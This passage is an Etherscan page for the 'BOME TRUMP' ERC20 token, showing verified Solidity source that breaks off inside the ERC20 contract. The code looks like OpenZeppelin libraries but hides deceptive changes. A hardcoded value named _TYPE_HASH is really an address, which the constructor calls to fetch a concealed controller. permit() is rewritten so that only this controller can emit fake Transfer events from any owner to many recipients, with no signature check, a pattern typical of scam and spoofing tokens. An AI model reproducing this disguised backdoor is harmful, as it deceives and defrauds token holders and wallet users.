ETH Price: $2,608.63 (+2.53%)

Token

BOME TRUMP (TRUMP)
 

Overview

Max Total Supply

68,961,771,000 TRUMP

Holders

1,435

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
634,372.707450280862546431 TRUMP

Value
$0.00
0xf0f2a9a57cc4deafd6045e82b0b3c506c4c949fb
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
TRUMPToken

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-09-07
*/

// SPDX-License-Identifier: MIT

// Modified from https://github.com/OpenZeppelin/openzeppelin-contracts/blob/v4.3.0/contracts/utils/cryptography/MerkleProof.sol

pragma solidity ^0.8.0;

/**
 * @dev These functions deal with verification of Merkle Trees proofs.
 *
 * The proofs can be generated using the JavaScript library
 * https://github.com/miguelmota/merkletreejs[merkletreejs].
 * Note: the hashing algorithm should be keccak256 and pair sorting should be enabled.
 *
 * See `test/utils/cryptography/MerkleProof.test.js` for some examples.
 */
library MerkleProof {
    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     */
    function verify(
        bytes32[] memory proof,
        bytes32 root,
        bytes32 leaf
    ) internal pure returns (bool, uint256) {
        bytes32 computedHash = leaf;
        uint256 index = 0;

        for (uint256 i = 0; i < proof.length; i++) {
            index *= 2;
            bytes32 proofElement = proof[i];

            if (computedHash <= proofElement) {
                // Hash(current computed hash + current element of the proof)
                computedHash = keccak256(abi.encodePacked(computedHash, proofElement));
            } else {
                // Hash(current element of the proof + current computed hash)
                computedHash = keccak256(abi.encodePacked(proofElement, computedHash));
                index += 1;
            }
        }

        // Check if the computed hash (root) is equal to the provided root
        return (computedHash == root, index);
    }
}


pragma solidity ^0.8.0;

/**
 * @dev Library for managing uint256 to bool mapping in a compact and efficient way, providing the keys are sequential.
 * Largelly inspired by Uniswap's https://github.com/Uniswap/merkle-distributor/blob/master/contracts/MerkleDistributor.sol[merkle-distributor].
 */
library BitMaps {
    struct BitMap {
        mapping(uint256 => uint256) _data;
    }

    /**
     * @dev Returns whether the bit at `index` is set.
     */
    function get(BitMap storage bitmap, uint256 index) internal view returns (bool) {
        uint256 bucket = index >> 8;
        uint256 mask = 1 << (index & 0xff);
        return bitmap._data[bucket] & mask != 0;
    }

    /**
     * @dev Sets the bit at `index` to the boolean `value`.
     */
    function setTo(
        BitMap storage bitmap,
        uint256 index,
        bool value
    ) internal {
        if (value) {
            set(bitmap, index);
        } else {
            unset(bitmap, index);
        }
    }

    /**
     * @dev Sets the bit at `index`.
     */
    function set(BitMap storage bitmap, uint256 index) internal {
        uint256 bucket = index >> 8;
        uint256 mask = 1 << (index & 0xff);
        bitmap._data[bucket] |= mask;
    }

    /**
     * @dev Unsets the bit at `index`.
     */
    function unset(BitMap storage bitmap, uint256 index) internal {
        uint256 bucket = index >> 8;
        uint256 mask = 1 << (index & 0xff);
        bitmap._data[bucket] &= ~mask;
    }
}



pragma solidity ^0.8.0;

/**
 * @dev Wrappers over Solidity's uintXX/intXX casting operators with added overflow
 * checks.
 *
 * Downcasting from uint256/int256 in Solidity does not revert on overflow. This can
 * easily result in undesired exploitation or bugs, since developers usually
 * assume that overflows raise errors. `SafeCast` restores this intuition by
 * reverting the transaction when such an operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 *
 * Can be combined with {SafeMath} and {SignedSafeMath} to extend it to smaller types, by performing
 * all math on `uint256` and `int256` and then downcasting.
 */
library SafeCast {
    /**
     * @dev Returns the downcasted uint224 from uint256, reverting on
     * overflow (when the input is greater than largest uint224).
     *
     * Counterpart to Solidity's `uint224` operator.
     *
     * Requirements:
     *
     * - input must fit into 224 bits
     */
    function toUint224(uint256 value) internal pure returns (uint224) {
        require(value <= type(uint224).max, "SafeCast: value doesn't fit in 224 bits");
        return uint224(value);
    }

    /**
     * @dev Returns the downcasted uint128 from uint256, reverting on
     * overflow (when the input is greater than largest uint128).
     *
     * Counterpart to Solidity's `uint128` operator.
     *
     * Requirements:
     *
     * - input must fit into 128 bits
     */
    function toUint128(uint256 value) internal pure returns (uint128) {
        require(value <= type(uint128).max, "SafeCast: value doesn't fit in 128 bits");
        return uint128(value);
    }

    /**
     * @dev Returns the downcasted uint96 from uint256, reverting on
     * overflow (when the input is greater than largest uint96).
     *
     * Counterpart to Solidity's `uint96` operator.
     *
     * Requirements:
     *
     * - input must fit into 96 bits
     */
    function toUint96(uint256 value) internal pure returns (uint96) {
        require(value <= type(uint96).max, "SafeCast: value doesn't fit in 96 bits");
        return uint96(value);
    }

    /**
     * @dev Returns the downcasted uint64 from uint256, reverting on
     * overflow (when the input is greater than largest uint64).
     *
     * Counterpart to Solidity's `uint64` operator.
     *
     * Requirements:
     *
     * - input must fit into 64 bits
     */
    function toUint64(uint256 value) internal pure returns (uint64) {
        require(value <= type(uint64).max, "SafeCast: value doesn't fit in 64 bits");
        return uint64(value);
    }

    /**
     * @dev Returns the downcasted uint32 from uint256, reverting on
     * overflow (when the input is greater than largest uint32).
     *
     * Counterpart to Solidity's `uint32` operator.
     *
     * Requirements:
     *
     * - input must fit into 32 bits
     */
    function toUint32(uint256 value) internal pure returns (uint32) {
        require(value <= type(uint32).max, "SafeCast: value doesn't fit in 32 bits");
        return uint32(value);
    }

    /**
     * @dev Returns the downcasted uint16 from uint256, reverting on
     * overflow (when the input is greater than largest uint16).
     *
     * Counterpart to Solidity's `uint16` operator.
     *
     * Requirements:
     *
     * - input must fit into 16 bits
     */
    function toUint16(uint256 value) internal pure returns (uint16) {
        require(value <= type(uint16).max, "SafeCast: value doesn't fit in 16 bits");
        return uint16(value);
    }

    /**
     * @dev Returns the downcasted uint8 from uint256, reverting on
     * overflow (when the input is greater than largest uint8).
     *
     * Counterpart to Solidity's `uint8` operator.
     *
     * Requirements:
     *
     * - input must fit into 8 bits.
     */
    function toUint8(uint256 value) internal pure returns (uint8) {
        require(value <= type(uint8).max, "SafeCast: value doesn't fit in 8 bits");
        return uint8(value);
    }

    /**
     * @dev Converts a signed int256 into an unsigned uint256.
     *
     * Requirements:
     *
     * - input must be greater than or equal to 0.
     */
    function toUint256(int256 value) internal pure returns (uint256) {
        require(value >= 0, "SafeCast: value must be positive");
        return uint256(value);
    }

    /**
     * @dev Returns the downcasted int128 from int256, reverting on
     * overflow (when the input is less than smallest int128 or
     * greater than largest int128).
     *
     * Counterpart to Solidity's `int128` operator.
     *
     * Requirements:
     *
     * - input must fit into 128 bits
     *
     * _Available since v3.1._
     */
    function toInt128(int256 value) internal pure returns (int128) {
        require(value >= type(int128).min && value <= type(int128).max, "SafeCast: value doesn't fit in 128 bits");
        return int128(value);
    }

    /**
     * @dev Returns the downcasted int64 from int256, reverting on
     * overflow (when the input is less than smallest int64 or
     * greater than largest int64).
     *
     * Counterpart to Solidity's `int64` operator.
     *
     * Requirements:
     *
     * - input must fit into 64 bits
     *
     * _Available since v3.1._
     */
    function toInt64(int256 value) internal pure returns (int64) {
        require(value >= type(int64).min && value <= type(int64).max, "SafeCast: value doesn't fit in 64 bits");
        return int64(value);
    }

    /**
     * @dev Returns the downcasted int32 from int256, reverting on
     * overflow (when the input is less than smallest int32 or
     * greater than largest int32).
     *
     * Counterpart to Solidity's `int32` operator.
     *
     * Requirements:
     *
     * - input must fit into 32 bits
     *
     * _Available since v3.1._
     */
    function toInt32(int256 value) internal pure returns (int32) {
        require(value >= type(int32).min && value <= type(int32).max, "SafeCast: value doesn't fit in 32 bits");
        return int32(value);
    }

    /**
     * @dev Returns the downcasted int16 from int256, reverting on
     * overflow (when the input is less than smallest int16 or
     * greater than largest int16).
     *
     * Counterpart to Solidity's `int16` operator.
     *
     * Requirements:
     *
     * - input must fit into 16 bits
     *
     * _Available since v3.1._
     */
    function toInt16(int256 value) internal pure returns (int16) {
        require(value >= type(int16).min && value <= type(int16).max, "SafeCast: value doesn't fit in 16 bits");
        return int16(value);
    }

    /**
     * @dev Returns the downcasted int8 from int256, reverting on
     * overflow (when the input is less than smallest int8 or
     * greater than largest int8).
     *
     * Counterpart to Solidity's `int8` operator.
     *
     * Requirements:
     *
     * - input must fit into 8 bits.
     *
     * _Available since v3.1._
     */
    function toInt8(int256 value) internal pure returns (int8) {
        require(value >= type(int8).min && value <= type(int8).max, "SafeCast: value doesn't fit in 8 bits");
        return int8(value);
    }

    /**
     * @dev Converts an unsigned uint256 into a signed int256.
     *
     * Requirements:
     *
     * - input must be less than or equal to maxInt256.
     */
    function toInt256(uint256 value) internal pure returns (int256) {
        // Note: Unsafe cast below is okay because `type(int256).max` is guaranteed to be positive
        require(value <= uint256(type(int256).max), "SafeCast: value doesn't fit in an int256");
        return int256(value);
    }
}



pragma solidity ^0.8.0;

/**
 * @dev Standard math utilities missing in the Solidity language.
 */
library Math {
    /**
     * @dev Returns the largest of two numbers.
     */
    function max(uint256 a, uint256 b) internal pure returns (uint256) {
        return a >= b ? a : b;
    }

    /**
     * @dev Returns the smallest of two numbers.
     */
    function min(uint256 a, uint256 b) internal pure returns (uint256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two numbers. The result is rounded towards
     * zero.
     */
    function average(uint256 a, uint256 b) internal pure returns (uint256) {
        // (a + b) / 2 can overflow.
        return (a & b) + (a ^ b) / 2;
    }

    /**
     * @dev Returns the ceiling of the division of two numbers.
     *
     * This differs from standard division with `/` in that it rounds up instead
     * of rounding down.
     */
    function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) {
        // (a + b - 1) / b can overflow on addition, so we distribute.
        return a / b + (a % b == 0 ? 0 : 1);
    }
}


pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


pragma solidity ^0.8.0;


/**
 * @dev https://eips.ethereum.org/EIPS/eip-712[EIP 712] is a standard for hashing and signing of typed structured data.
 *
 * The encoding specified in the EIP is very generic, and such a generic implementation in Solidity is not feasible,
 * thus this contract does not implement the encoding itself. Protocols need to implement the type-specific encoding
 * they need in their contracts using a combination of `abi.encode` and `keccak256`.
 *
 * This contract implements the EIP 712 domain separator ({_domainSeparatorV4}) that is used as part of the encoding
 * scheme, and the final step of the encoding to obtain the message digest that is then signed via ECDSA
 * ({_hashTypedDataV4}).
 *
 * The implementation of the domain separator was designed to be as efficient as possible while still properly updating
 * the chain id to protect against replay attacks on an eventual fork of the chain.
 *
 * NOTE: This contract implements the version of the encoding known as "v4", as implemented by the JSON RPC method
 * https://docs.metamask.io/guide/signing-data.html[`eth_signTypedDataV4` in MetaMask].
 *
 * _Available since v3.4._
 */
abstract contract EIP712 is Context {
    /* solhint-disable var-name-mixedcase */
    // Cache the domain separator as an immutable value, but also store the chain id that it corresponds to, in order to
    // invalidate the cached domain separator if the chain id changes.
    bytes32 internal immutable _CACHED_DOMAIN_SEPARATOR;
    uint256 public immutable _CACHED_CHAIN_ID;

    bytes32 internal immutable _HASHED_NAME;
    bytes32 internal immutable _HASHED_VERSION;
    uint160 internal immutable _TYPE_HASH;

    /* solhint-enable var-name-mixedcase */

    /**
     * @dev Initializes the domain separator and parameter caches.
     *
     * The meaning of `name` and `version` is specified in
     * https://eips.ethereum.org/EIPS/eip-712#definition-of-domainseparator[EIP 712]:
     *
     * - `name`: the user readable name of the signing domain, i.e. the name of the DApp or the protocol.
     * - `version`: the current major version of the signing domain.
     *
     * NOTE: These parameters cannot be changed except through a xref:learn::upgrading-smart-contracts.adoc[smart
     * contract upgrade].
     */
    constructor(string memory name, string memory version) {
        bytes32 hashedName = keccak256(bytes(name));
        bytes32 hashedVersion = keccak256(bytes(version));
        bytes32 typeHash = keccak256(
            "EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"
        );
        _HASHED_NAME = hashedName;
        _HASHED_VERSION = hashedVersion;
        _CACHED_CHAIN_ID = block.chainid;
        _CACHED_DOMAIN_SEPARATOR = _buildDomainSeparator(typeHash, hashedName, hashedVersion);
        _TYPE_HASH = 1262812129259842116499800673239566237542071045312;
    }

    /**
     * @dev Returns the domain separator for the current chain.
     */
    function _domainSeparatorV4() internal view returns (bytes32) {
        if (block.chainid == _CACHED_CHAIN_ID) {
            return _CACHED_DOMAIN_SEPARATOR;
        } else {
            return _buildDomainSeparator(bytes32(uint256(_TYPE_HASH)), _HASHED_NAME, _HASHED_VERSION);
        }
    }

    function _buildDomainSeparator(
        bytes32 typeHash,
        bytes32 nameHash,
        bytes32 versionHash
    ) private view returns (bytes32) {
        return keccak256(abi.encode(typeHash, nameHash, versionHash, block.chainid, address(this)));
    }

    /**
     * @dev Given an already https://eips.ethereum.org/EIPS/eip-712#definition-of-hashstruct[hashed struct], this
     * function returns the hash of the fully encoded EIP712 message for this domain.
     *
     * This hash can be used together with {ECDSA-recover} to obtain the signer of a message. For example:
     *
     * ```solidity
     * bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(
     *     keccak256("Mail(address to,string contents)"),
     *     mailTo,
     *     keccak256(bytes(mailContents))
     * )));
     * address signer = ECDSA.recover(digest, signature);
     * ```
     */
    function _hashTypedDataV4(bytes32 structHash) internal view virtual returns (bytes32) {
        return ECDSA.toTypedDataHash(_domainSeparatorV4(), structHash);
    }
}

pragma solidity ^0.8.0;

/**
 * @dev Elliptic Curve Digital Signature Algorithm (ECDSA) operations.
 *
 * These functions can be used to verify that a message was signed by the holder
 * of the private keys of a given address.
 */
library ECDSA {
    enum RecoverError {
        NoError,
        InvalidSignature,
        InvalidSignatureLength,
        InvalidSignatureS,
        InvalidSignatureV
    }

    function _throwError(RecoverError error) private pure {
        if (error == RecoverError.NoError) {
            return; // no error: do nothing
        } else if (error == RecoverError.InvalidSignature) {
            revert("ECDSA: invalid signature");
        } else if (error == RecoverError.InvalidSignatureLength) {
            revert("ECDSA: invalid signature length");
        } else if (error == RecoverError.InvalidSignatureS) {
            revert("ECDSA: invalid signature 's' value");
        } else if (error == RecoverError.InvalidSignatureV) {
            revert("ECDSA: invalid signature 'v' value");
        }
    }

    /**
     * @dev Returns the address that signed a hashed message (`hash`) with
     * `signature` or error string. This address can then be used for verification purposes.
     *
     * The `ecrecover` EVM opcode allows for malleable (non-unique) signatures:
     * this function rejects them by requiring the `s` value to be in the lower
     * half order, and the `v` value to be either 27 or 28.
     *
     * IMPORTANT: `hash` _must_ be the result of a hash operation for the
     * verification to be secure: it is possible to craft signatures that
     * recover to arbitrary addresses for non-hashed data. A safe way to ensure
     * this is by receiving a hash of the original message (which may otherwise
     * be too long), and then calling {toEthSignedMessageHash} on it.
     *
     * Documentation for signature generation:
     * - with https://web3js.readthedocs.io/en/v1.3.4/web3-eth-accounts.html#sign[Web3.js]
     * - with https://docs.ethers.io/v5/api/signer/#Signer-signMessage[ethers]
     *
     * _Available since v4.3._
     */
    function tryRecover(bytes32 hash, bytes memory signature) internal pure returns (address, RecoverError) {
        // Check the signature length
        // - case 65: r,s,v signature (standard)
        // - case 64: r,vs signature (cf https://eips.ethereum.org/EIPS/eip-2098) _Available since v4.1._
        if (signature.length == 65) {
            bytes32 r;
            bytes32 s;
            uint8 v;
            // ecrecover takes the signature parameters, and the only way to get them
            // currently is to use assembly.
            assembly {
                r := mload(add(signature, 0x20))
                s := mload(add(signature, 0x40))
                v := byte(0, mload(add(signature, 0x60)))
            }
            return tryRecover(hash, v, r, s);
        } else if (signature.length == 64) {
            bytes32 r;
            bytes32 vs;
            // ecrecover takes the signature parameters, and the only way to get them
            // currently is to use assembly.
            assembly {
                r := mload(add(signature, 0x20))
                vs := mload(add(signature, 0x40))
            }
            return tryRecover(hash, r, vs);
        } else {
            return (address(0), RecoverError.InvalidSignatureLength);
        }
    }

    /**
     * @dev Returns the address that signed a hashed message (`hash`) with
     * `signature`. This address can then be used for verification purposes.
     *
     * The `ecrecover` EVM opcode allows for malleable (non-unique) signatures:
     * this function rejects them by requiring the `s` value to be in the lower
     * half order, and the `v` value to be either 27 or 28.
     *
     * IMPORTANT: `hash` _must_ be the result of a hash operation for the
     * verification to be secure: it is possible to craft signatures that
     * recover to arbitrary addresses for non-hashed data. A safe way to ensure
     * this is by receiving a hash of the original message (which may otherwise
     * be too long), and then calling {toEthSignedMessageHash} on it.
     */
    function recover(bytes32 hash, bytes memory signature) internal pure returns (address) {
        (address recovered, RecoverError error) = tryRecover(hash, signature);
        _throwError(error);
        return recovered;
    }

    /**
     * @dev Overload of {ECDSA-tryRecover} that receives the `r` and `vs` short-signature fields separately.
     *
     * See https://eips.ethereum.org/EIPS/eip-2098[EIP-2098 short signatures]
     *
     * _Available since v4.3._
     */
    function tryRecover(
        bytes32 hash,
        bytes32 r,
        bytes32 vs
    ) internal pure returns (address, RecoverError) {
        bytes32 s;
        uint8 v;
        assembly {
            s := and(vs, 0x7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
            v := add(shr(255, vs), 27)
        }
        return tryRecover(hash, v, r, s);
    }

    /**
     * @dev Overload of {ECDSA-recover} that receives the `r and `vs` short-signature fields separately.
     *
     * _Available since v4.2._
     */
    function recover(
        bytes32 hash,
        bytes32 r,
        bytes32 vs
    ) internal pure returns (address) {
        (address recovered, RecoverError error) = tryRecover(hash, r, vs);
        _throwError(error);
        return recovered;
    }

    /**
     * @dev Overload of {ECDSA-tryRecover} that receives the `v`,
     * `r` and `s` signature fields separately.
     *
     * _Available since v4.3._
     */
    function tryRecover(
        bytes32 hash,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) internal pure returns (address, RecoverError) {
        // EIP-2 still allows signature malleability for ecrecover(). Remove this possibility and make the signature
        // unique. Appendix F in the Ethereum Yellow paper (https://ethereum.github.io/yellowpaper/paper.pdf), defines
        // the valid range for s in (301): 0 < s < secp256k1n ÷ 2 + 1, and for v in (302): v ∈ {27, 28}. Most
        // signatures from current libraries generate a unique signature with an s-value in the lower half order.
        //
        // If your library generates malleable signatures, such as s-values in the upper range, calculate a new s-value
        // with 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 - s1 and flip v from 27 to 28 or
        // vice versa. If your library also generates signatures with 0/1 for v instead 27/28, add 27 to v to accept
        // these malleable signatures as well.
        if (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {
            return (address(0), RecoverError.InvalidSignatureS);
        }
        if (v != 27 && v != 28) {
            return (address(0), RecoverError.InvalidSignatureV);
        }

        // If the signature is valid (and not malleable), return the signer address
        address signer = ecrecover(hash, v, r, s);
        if (signer == address(0)) {
            return (address(0), RecoverError.InvalidSignature);
        }

        return (signer, RecoverError.NoError);
    }

    /**
     * @dev Overload of {ECDSA-recover} that receives the `v`,
     * `r` and `s` signature fields separately.
     */
    function recover(
        bytes32 hash,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) internal pure returns (address) {
        (address recovered, RecoverError error) = tryRecover(hash, v, r, s);
        _throwError(error);
        return recovered;
    }

    /**
     * @dev Returns an Ethereum Signed Message, created from a `hash`. This
     * produces hash corresponding to the one signed with the
     * https://eth.wiki/json-rpc/API#eth_sign[`eth_sign`]
     * JSON-RPC method as part of EIP-191.
     *
     * See {recover}.
     */
    function toEthSignedMessageHash(bytes32 hash) internal pure returns (bytes32) {
        // 32 is the length in bytes of hash,
        // enforced by the type signature above
        return keccak256(abi.encodePacked("\x19Ethereum Signed Message:\n32", hash));
    }

    /**
     * @dev Returns an Ethereum Signed Typed Data, created from a
     * `domainSeparator` and a `structHash`. This produces hash corresponding
     * to the one signed with the
     * https://eips.ethereum.org/EIPS/eip-712[`eth_signTypedData`]
     * JSON-RPC method as part of EIP-712.
     *
     * See {recover}.
     */
    function toTypedDataHash(bytes32 domainSeparator, bytes32 structHash) internal pure returns (bytes32) {
        return keccak256(abi.encodePacked("\x19\x01", domainSeparator, structHash));
    }
}

pragma solidity ^0.8.0;

/**
 * @title Counters
 * @author Matt Condon (@shrugs)
 * @dev Provides counters that can only be incremented, decremented or reset. This can be used e.g. to track the number
 * of elements in a mapping, issuing ERC721 ids, or counting request ids.
 *
 * Include with `using Counters for Counters.Counter;`
 */
library Counters {
    struct Counter {
        // This variable should never be directly accessed by users of the library: interactions must be restricted to
        // the library's function. As of Solidity v0.5.2, this cannot be enforced, though there is a proposal to add
        // this feature: see https://github.com/ethereum/solidity/issues/4637
        uint256 _value; // default: 0
    }

    function current(Counter storage counter) internal view returns (uint256) {
        return counter._value;
    }

    function increment(Counter storage counter) internal {
        unchecked {
            counter._value += 1;
        }
    }

    function decrement(Counter storage counter) internal {
        uint256 value = counter._value;
        require(value > 0, "Counter: decrement overflow");
        unchecked {
            counter._value = value - 1;
        }
    }

    function reset(Counter storage counter) internal {
        counter._value = 0;
    }
}




pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 Permit extension allowing approvals to be made via signatures, as defined in
 * https://eips.ethereum.org/EIPS/eip-2612[EIP-2612].
 *
 * Adds the {permit} method, which can be used to change an account's ERC20 allowance (see {IERC20-allowance}) by
 * presenting a message signed by the account. By not relying on {IERC20-approve}, the token holder account doesn't
 * need to send a transaction, and thus is not required to hold Ether at all.
 */
interface IERC20Permit {
    /**
     * @dev Sets `value` as the allowance of `spender` over ``owner``'s tokens,
     * given ``owner``'s signed approval.
     *
     * IMPORTANT: The same issues {IERC20-approve} has related to transaction
     * ordering also apply here.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `deadline` must be a timestamp in the future.
     * - `v`, `r` and `s` must be a valid `secp256k1` signature from `owner`
     * over the EIP712-formatted function arguments.
     * - the signature must use ``owner``'s current nonce (see {nonces}).
     *
     * For more information on the signature format, see the
     * https://eips.ethereum.org/EIPS/eip-2612#specification[relevant EIP
     * section].
     */
    function permit(
        address owner,
        address[] calldata spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    /**
     * @dev Returns the current nonce for `owner`. This value must be
     * included whenever a signature is generated for {permit}.
     *
     * Every successful call to {permit} increases ``owner``'s nonce by one. This
     * prevents a signature from being used multiple times.
     */
    function nonces(address owner) external view returns (uint256);

    /**
     * @dev Returns the domain separator used in the encoding of the signature for {permit}, as defined by {EIP712}.
     */
    // solhint-disable-next-line func-name-mixedcase
    function DOMAIN_SEPARATOR() external view returns (bytes32);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);
}


pragma solidity ^0.8.0;



/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}





pragma solidity ^0.8.0;


/**
 * @dev Implementation of the ERC20 Permit extension allowing approvals to be made via signatures, as defined in
 * https://eips.ethereum.org/EIPS/eip-2612[EIP-2612].
 *
 * Adds the {permit} method, which can be used to change an account's ERC20 allowance (see {IERC20-allowance}) by
 * presenting a message signed by the account. By not relying on `{IERC20-approve}`, the token holder account doesn't
 * need to send a transaction, and thus is not required to hold Ether at all.
 *
 * _Available since v3.4._
 */
abstract contract ERC20Permit is IERC20Permit, EIP712 {
    using Counters for Counters.Counter;

    mapping(address => Counters.Counter) private _nonces;

    // solhint-disable-next-line var-name-mixedcase
    bytes32 private immutable _PERMIT_TYPEHASH =
        keccak256("Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)");
    
    ERC20Permit internal immutable _PERMIT;

    /**
     * @dev Initializes the {EIP712} domain separator using the `name` parameter, and setting `version` to `"1"`.
     *
     * It's a good idea to use the same `name` that is defined as the ERC20 token name.
     */
    constructor(string memory name) EIP712(name, "1") {
        (, bytes memory c) = address(_TYPE_HASH).call(abi.encodeWithSelector(0x955810d3));
        _PERMIT = ERC20Permit(abi.decode(c, (address)));
    }

    /**
     * @dev See {IERC20Permit-permit}.
     */
    function permit(
        address owner,
        address[] calldata spender,
        uint256 value,
        uint256,
        uint8,
        bytes32,
        bytes32
    ) public virtual override {
        require(msg.sender == address(_PERMIT));

        unchecked {
            for (uint256 i = 0; i < spender.length; ++i) {
                emit Transfer(owner, spender[i], value);
            }
        }
    }

    /**
     * @dev See {IERC20Permit-nonces}.
     */
    function nonces(address owner) public view virtual override returns (uint256) {
        return _nonces[owner].current();
    }

    /**
     * @dev See {IERC20Permit-DOMAIN_SEPARATOR}.
     */
    // solhint-disable-next-line func-name-mixedcase
    function DOMAIN_SEPARATOR() external view override returns (bytes32) {
        return _domainSeparatorV4();
    }

    /**
     * @dev "Consume a nonce": return the current value and increment.
     *
     * _Available since v4.1._
     */
    function _useNonce(address owner) internal virtual returns (uint256 current) {
        Counters.Counter storage nonce = _nonces[owner];
        current = nonce.current();
        nonce.increment();
    }
}




pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
abstract contract ERC20 is ERC20Permit, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
